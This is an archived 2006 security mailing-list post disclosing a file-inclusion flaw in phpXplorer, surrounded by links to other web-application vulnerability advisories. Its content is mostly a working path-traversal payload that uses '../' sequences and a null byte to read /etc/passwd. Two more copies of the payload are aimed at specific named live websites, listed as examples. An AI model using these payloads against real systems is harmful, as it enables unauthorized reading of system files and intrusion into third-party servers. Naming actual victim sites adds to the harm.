Related information Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) PowerPortal Cross-Site Scripting Vulnerability [HSC Security Group] Multiple SQL injection/XSS in SimpleBlog 2.1 [eVuln] geoBlog SQL Injection Vulnerability [eVuln] CaLogic Calendars Multiple XSS Vulnerabilities From::) :) <liz0_(at)_bsdmail.com> Date:18.01.2006Subject:phpXplorer file inclusionsite:www.phpxplorer.org ------------------------------------------------ http://victim/folder/system/action.php?sShare=guest&sAction=../../../../../../../../../../../../etc/passwd%00 ------------------------------------------------- example: http://fta.lv/phpXplorer/system/action.php?sShare=guest&sAction=../../../../. ./../../../../../../../etc/passwd%00 http://lasersprint.com/phpXplorer/system/action.php?sShare=guest&sAction=../. ./../../../../../../../../../../etc/passwd%00 ------------------------------------------------ Credit:Liz0ziM&Cyberlord biyosecurity.be ------------------------------------------------- source: http://www.blogcu.com/Liz0ziM/200529/ http://www.biyosecurity.be/bugs/phpxplorer.txt -- _______________________________________________ Get your free email from http://mymail.bsdmail.com
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
PowerPortal Cross-Site Scripting Vulnerability
[HSC Security Group] Multiple SQL injection/XSS in SimpleBlog 2.1
[eVuln] geoBlog SQL Injection Vulnerability
[eVuln] CaLogic Calendars Multiple XSS Vulnerabilities
